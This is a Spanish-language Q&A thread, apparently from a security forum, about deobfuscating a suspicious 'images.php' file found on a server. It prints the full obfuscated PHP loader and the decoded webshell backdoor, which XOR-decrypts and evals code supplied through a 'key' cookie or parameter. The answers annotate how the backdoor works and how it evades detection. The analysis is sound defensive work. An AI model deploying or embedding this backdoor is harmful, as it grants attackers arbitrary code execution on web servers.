¿Cómo desofuscar este malware PHP? [duplicada]


Hace dos días apareció un archivo llamado "images.php" en el servidor de un amigo, quien se dio cuenta porque causaba errores. El archivo contenía lo siguiente. Este código es de origen desconocido y se presume que es malware, por lo que NO LO EJECUTE.

<?php for($o=0,$e='&\'()*+,-.:]^_'{|,,,|-((.(*,|)')&(_(*,+)'(-(,+_(-(.(:(](^(_('({)]+'+{+|,&-^-_(^)](](^(_(^(:('(,-_(.-_(](:(,+_(-+_(--_('(.(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^('(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-('(:(.(,(.(.+_(-(.+'(,-_(.('(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,('(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+'(',&(:+{(.-^(_-_('-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(')](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^('('(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|('('(.(.+_(--^(,(.(:+{+_(-+'('+_(-(:('(:-_(,,&(,-_(.+{(,+_(-(:)]('+_(-(.+{(_+_(-(_+'+_(-)]+_(-(_(,(.(:('(')]+_(-,&(:+'+_(--^(.(.('(_(,-^(:('(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](:(_(:(,(,-_('+{(]-^(.('('-_+_(-(,(,(^(^-^+_(-('(,+'(:(_(:+|+_(-({('+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(')](^-_(_(:(^+'(_+'('+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+'(:+|(,)](:({(]+'(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:('(]+'(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+'(,+'(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+'(:(](.(,(]-^+_(-('(,({('(^('(^(.+'(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:('(.+_(-(,(:(.(,+_(--^(:)]('-^(]+|(:(_(^-^+_(-('(,('(:-^(,(_(,-_(.+{(,-_(.)]('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:(_+_(-+'(:(_(,(](_,&('-_(](.('-^(:+|
+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+'(:(_(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+'(](_+_(-('(,(^('(^('(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-('(](:('(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+'(^(:(,+'(,(.(.+_(-(.,&+_(-)]('+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+'(:+|(,(_(,-_(.+{(,-_(.)]('+_(-(]('(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+'(,-^(,(:(:(:(.+'(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+'(,-^(,(:(:(:(.+'(:(^(.(,(,(.(.-_(:+'(,('+_(-+'(^(:(,+'(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+'(](_+_(-('(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+'(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:('+_(-({+_(-+'(^(:(,+'(,-^(:+_(-('(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-('+_(-(:(:('(:+'(^(,('(:(,(](.(^('(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+'(.+{(.(,(,+'(.+|(^+'+_(-(:(,)](:-^(:+|(],&('+'(^+_(-(:('(^+|(](](_+'(^(^+_(-+'(,-^(:+_(-(:(.(]+'(:+'(,+|(_+'(.+_(-(,-^(_(^(^(^+_(-(:(,(^('(.(:+'(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('(](](_(,+'(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:('(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+'(.)](^+'(^(^(]('+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-('+_(-(:(:+{(.+'+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+'(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_('-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+'+_(-('(.,&(^('(,+_(-(:(](:+{(:('(,(:(,+|(,,&(.-_(.(.(:(](.(](^+'+_(--^(](.('+{(_(.(_(,(:+'(,+|(_(.('('(,({(.(](^({(.,&
(,({(:,&(:('(,+|(:+'(,,&(_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:('(.,&(]+'(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+'(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^('(.(.+_(-(:(^(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,+_(-+_(-(:+'(,+|(_(.(:-^(,+'(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,('+_(-)](:+|('+_(-(.+'(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,(](:(_({+_(-('(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_('+'+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.('(:(^(.+{(:+'(,('(_,&+_(--_(])]+_(-)](:('(.,&+_(--_(.+_(-(,(](_(.('(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)]('-^(,(_(:+|(,)](.+{(:+'(:(](:(:(^('+_(--^+_(--^(:('('-^(:('('+'(^+_(-(:('(.+{(_+_(-(_+'+_(-)](^(.(,({(:+'(:+|(,)](:({(]+'(:)](:('(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+'(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('+{(],&(:)](:('(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&('+'(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-('(](:('(^(:+'(,+{(:,&(]+'(.(](:)]+_(--_(_(^(^(:(,+'(,-^(:+_(-(_(:(]+'(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^('(.(:({(,)](.('(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(',&('(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-('(,({('(.(:+_(-(,-_(:-_+_(-+'(.-_(.(]+_(-({(]-_(^(,(,('(,(^(:+_(-(.,&(,(:(:+|(,(](_+'(.-^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^('(_(,(.(,+'(.+_(-(.+'+_(--^(:+{+_(-({(:-_('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+'(]-_(:+_(-('(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+'(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+'(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.('(.(,,&('({('(_(,
(.(,(](.(.(:+|(,(]('+{(]-^(.)]('+'(]+|(:('+_(-+_(-(^+{(](.('+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(]('(_+_(-(](,-^(:,&(:-_(](.('('(,+|(_(:('-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)]('-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+'('(.(,(]('-^(]+{('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,('(_(:(_(^+_(-(:+'(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_('-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+'(:(:(,(^(_,&+_(-(.+_(-+_(-(]('(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_('+{(^('(,(,+_(-)](:(:(.(,(](.('(]+_(-+'(.(:(.(_(,-^(_(.+_(-+'(^(^+_(-)]('(^('(,(](_(_(.(^('('(](:('+_(-)](:('(^('(,+{(](:('(^(.)](,(:(.(:(,-_(_,&('+'(]+|(:(.+_(-+_(-(^+{(]('(_(,(_(](^(](:(.+_(-({(:({(:('+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&('-_(],&(:,&('+_(-(](.(_+|+_(-+'(^(_(,,&('+{('(,(](:(.({(.+'(.+|(:(^(,('(.+'(](^+_(-('(](:('(_(:-_(:+_(-(_(:(:('(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^('+'('({(.+'(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+'(,-_('(,(](:(.({(]-^(.(^('({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+'(](.('('(,+|+_(-+_(-(_('(:(_(_+|(,,&(,-_(.+{(:(](:+'(,(_(:+|+_(-)](.-_('-^(]-_(.(:(_,&(](:(:(_('+{(_(.(.+'(.(:+_(-({(.(^(:(^(:(](.(_(^+'+_(-,&+_(-({(:('('+_(-(]-^(.(:(](:('+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{('(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(')]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](',&(,(^(_({(.+'(.-_(.-^(,-^(.(_+_(--^(^(_(,({('-^(',&(,(^('+'(^+_(-(.-_(:(^(,(:(.+'+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_('-^(])]+_(-)](^({(^(,(]('('(_(:(_(](:(_({+_(-('(](,(')](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.('(]+'(.+|(:(:+_(--_(.(_(^-^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(]('('(_(.)](](_('('+_(-({(_(_('(.(,('(_+|(:+|(,)](_+_(-(^+{(:(,(,+|('+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+'(:(_(,(](_(.('(.(,+'(_)]+_(-(.(,(.(](.('+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-
)](,+|(:+|+_(-+'(.-_(:({(](:(_+_(-(^+'(^-^(])](.(^(:+{(]({('+'(](:(](,(^-_(_(.(:-^(:+|('+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(]('('(,+_(--^(.-_(,('(]+'(_({('({(]-_(:('+_(-({(^(,(]+{+_(-+'(,,&(:-^(,(:(](^('+{('({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_('+{+_(-+|(:+'(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:('(_(.+'(](:('+'(_(,(](:(^-_(_(.(:-^(:+|('+{(_(.(^+{(^(,(]-^(:+_(-(^('(,+'(:(,+_(-)](.(,(^('+_(-(_(](:('(_(.+'(](_(_+{(^+{('(:(_(](](.('-^(:+|('+{(_(.(^+{(^(,(.+'(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&('-^(',&(,({('+'(^+_(-(](,(^-_(_(.(]+|(]+{('({(_(.(^+{(^(,(.+'(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&('+{(_(.(_(,(^+'(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({('+_(-(^+|(_(.(]+|(]+{('({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:('(^+|(](](_+'(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+'(:(:+_(-(:(.(,(^(^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+'(,(:(.+|('-^(]-_(.(_(,+{(]-_(^(_('(,(.-^(,(.(:+'(,)](.(.('(_+_(-({(:(,(](_+_(-('+_(-)](:(](:+|+_(--^(:(,(,(.(_+'(_('(^(^(_(^+_(-)]+_(-(_(,-^(.(]('(_(,(](.(_(,(_(.(_('(_(^)]('+{+_(-(_(^,&(,-_(:('(.-_(](^(:,&+_(--_(.(_(:+'(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^('(:(.(^(,+_(-('(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^('(_(])](,+'(',&(.-^(,(^('(,(_(.(_(,(^+'+_(-('(](,(^-_(,-^(.)](](^+_(-('(,(.(:(]('+_(-(.+'(.(,+_(--^(:({(.(^+_(--_(:('+_(--^(^(_(,({('-^('+{+_(-)](.(_+_(-+'(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:('(,('(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|('-^(',&(,)]('+'(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_('('(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_('('(,+{+_(-+_(-(_(.(:(_(_+|(,,&('({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+'(,+'(.+_(-(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+{+_(-(,(.+'(,
(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+'(]-_(:+_(-('(,(^+_(-(.-^(_(,(](:(:(:(,('(:(_(^(:+_(-+{(,,&('+'(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({('+{(_(.+_(-('(^)](_(:(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|+_(-)](.(.(:(:(,('(.)](_)]+_(-('+_(-(:(:('(:+'(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+'+_(--^(:(](:('(.+_(-(,-_(:(,(](.(_-^(:(^(](.('-^(]+{('({(_(.(:('(:(^+_(-)](:(_(,(:(.+|('-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:('(:(,(,+|('+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+'(:(_(,(](_(:(.,&+_(-(:+_(-+'(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(:(,+'(,-^(:+_(-('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,('('(,(]('('('+_(-(:({(.-_('+|(.(](,(,+_(-('(_-_+_(-({(:({(:({+_(-(:(:+|(]+|('-^(:+|(^(_(,({(_-_(',&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+'(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.('+'(',&(,)]('+'(](:(:+_(-('(.(,({('({+_(-(.(.,&(:+{+_(-,&(,+'(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&('+'+_(-)](,-_(:-^+_(-+'(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](',&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-('(^)](,(:(.+|('-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+'(,)]+_(-(^(.('+_(--^(.+'(](.+_(-('+_(-({(,,&(:-^+_(-+'(:(,(](.(_(:('-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:('+_(-({(.,&(^(:(,+_(-(](:('(_(:+'(](:(_({+_(-('(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)]('-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)'(-(-)^*&,|-(,*(.(*,++^(*,|+'(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+'+')'(*,|)^-',+,_-),+-^(*,*({)'*&,),.-((.(.(*,.+^(*,++^(*,|+'+')_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+'+'(:(:)^-'-',:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)'(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)'(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(
+))^(*+|*-*++*)'(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-'(*,^)'(*+|*)*|*|*^*:*++^(-,^,+-:(-+')^,:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|+&*|+)+*+^(-,^,+-:(-+')^-',:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|*-*++*+^(-,^,+-:(-+')^-',:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-'(*,+,_)'*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)'*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)'(*,+,_(+(*,^,_)^(*,,,_)'(*,+,_('(*-(,_)^,,,|-((.(*,|)')&)^(*,|)_(*,,,_)^(*,|(^)'(*,^,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-',:,,(.(*-(,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)'*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-'-(,+-*-+-(,{(.(*,*(:)^-'(-(:)^-'(*,*)'*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

Reemplacé eval por echo, lo ejecuté en phpfiddle y obtuve más de la misma ofuscación, esta vez con varias líneas con eval.

¿Cuál es la mejor manera de desofuscar este tipo de código para poder averiguar qué está haciendo?

    
pregunta Robert 01.05.2014 - 22:04

3 respuestas


Por lo general, a los creadores de malware les resulta muy difícil ofuscar la propia llamada a exec() o eval(), así que una buena técnica es reemplazar esas llamadas por un echo. Si se hace eso con el código anterior, se obtiene otro montón de código igualmente ofuscado, que en su mayoría es basura salvo por lo que aparece al final:

if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}$k=$_COOKIE['key'];if(empty($k)){$k=$_POST['key'];}if(empty($k)){$k=$_GET['key'];}if(!@function_exists('decrypt')){eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');}$d=@decrypt($d,$k);eval($d);

Si se limpia un poco (gracias a IntelliJ) y se añaden algunos comentarios:

// Compatibility with really old versions of PHP I think
// (the $HTTP_*_VARS arrays predate the $_COOKIE/$_POST/$_GET superglobals;
// $_SERVER is populated on any modern PHP, so this branch should never run there)
if (!@isset($_SERVER)) {
    $_COOKIE =& $HTTP_COOKIE_VARS;
    $_POST =& $HTTP_POST_VARS;
    $_GET =& $HTTP_GET_VARS;
}
// If there's a cookie called "key" set $k to be the XOR key for the payload.
// $k is entirely request-controlled: nothing on the server side supplies or
// validates it. There is no isset() check, so a missing cookie leaves $k null
// (plus an "Undefined array key" notice, which may be part of the errors the
// file caused).
$k = $_COOKIE['key'];
if (empty($k)) {
    $k = $_POST['key'];
}
// If there's no cookie then get the key from a GET parameter called 'key'.
// Lookup order is cookie, then POST, then GET. For triage, requests to this
// file that carry a "key" cookie or parameter are the ones worth pulling from
// the access logs.
if (empty($k)) {
    $k = $_GET['key'];
}

// Define a function to de-obfuscate the payload.
// The definition lives inside an eval() of a string literal, so the text
// "function decrypt" never appears as plain code — presumably to evade simple
// signature scans. decrypt() is a repeating-key XOR: the payload is cut into
// key-sized chunks, each chunk is XORed with the key (string ^ operator), and a
// trailing partial chunk is XORed with the key truncated to the leftover
// length. It returns null (no output) when $k is empty.
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
}
// Set $d to the de-obfuscated payload.
// $d is not assigned anywhere in this listing — presumably the outer decoding
// stage that produced this code fills it in; confirm against the full file.
// The @ hides any notice decrypt() emits (it never initialises its own $d).
$d = @decrypt($d, $k);

// eval $d — runs whatever PHP the requester encrypted with their key.
// This is the backdoor proper: arbitrary code execution with no server-side
// check on the payload. With a wrong key the XOR output is garbage and eval()
// typically fails with a parse error rather than doing anything.
eval($d);

Lo que es mucho más fácil de entender.

Así que básicamente son:

  1. Busca una cookie llamada key
  2. Si no hay cookie, comprueba los parámetros GET
  3. Desofusca la carga útil obtenida de la cookie o del parámetro GET
  4. Evalúa ese código

La razón por la que se molestan en ofuscar la carga útil que pasan en la cookie o en el parámetro GET es reducir la probabilidad de que la detecte un IDS que busque código PHP, o de que alguien la vea en los registros.

    
respondido por el thexacre 02.05.2014 - 11:25

He desofuscado completamente el código, solo por diversión.

Primero, algunos comentarios sobre la parte maliciosa del código. El operador @ se aplica a casi todas las llamadas a función. Esto suprime las advertencias que el código podría generar, lo que ayuda a mantenerlo oculto de los administradores de sistemas que revisan regularmente sus registros.

NB: no sé por qué la definición de la función decrypt() se hace dentro de un eval(). El código funcionaría exactamente igual si simplemente se declarara la función dentro de la rama verdadera del if.

Aquí está el código completo otra vez:

// Compatibility for old versions of PHP which used different variable naming
// (the $HTTP_*_VARS arrays predate the $_COOKIE/$_POST/$_GET superglobals;
// $_SERVER is populated on any modern PHP, so this branch should never run there)
if (!@isset($_SERVER)) {
    $_COOKIE =& $HTTP_COOKIE_VARS;
    $_POST =& $HTTP_POST_VARS;
    $_GET =& $HTTP_GET_VARS;
}
// If there's a cookie called "key" set $k to be the XOR key for the payload.
// $k is entirely request-controlled: nothing on the server side supplies or
// validates it. There is no isset() check, so a missing cookie leaves $k null
// (plus an "Undefined array key" notice, which may be part of the errors the
// file caused).
$k = $_COOKIE['key'];
if (empty($k)) {
    $k = $_POST['key'];
}
// If there's no cookie then get the key from a GET parameter called 'key'.
// Lookup order is cookie, then POST, then GET. For triage, requests to this
// file that carry a "key" cookie or parameter are the ones worth pulling from
// the access logs.
if (empty($k)) {
    $k = $_GET['key'];
}

// Define a function to de-obfuscate the payload.
// The definition lives inside an eval() of a string literal, so the text
// "function decrypt" never appears as plain code — presumably to evade simple
// signature scans. decrypt() is a repeating-key XOR: the payload is cut into
// key-sized chunks, each chunk is XORed with the key (string ^ operator), and a
// trailing partial chunk is XORed with the key truncated to the leftover
// length. It returns null (no output) when $k is empty.
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
}
// Set $d to the de-obfuscated payload.
// $d is not assigned anywhere in this listing — presumably the outer decoding
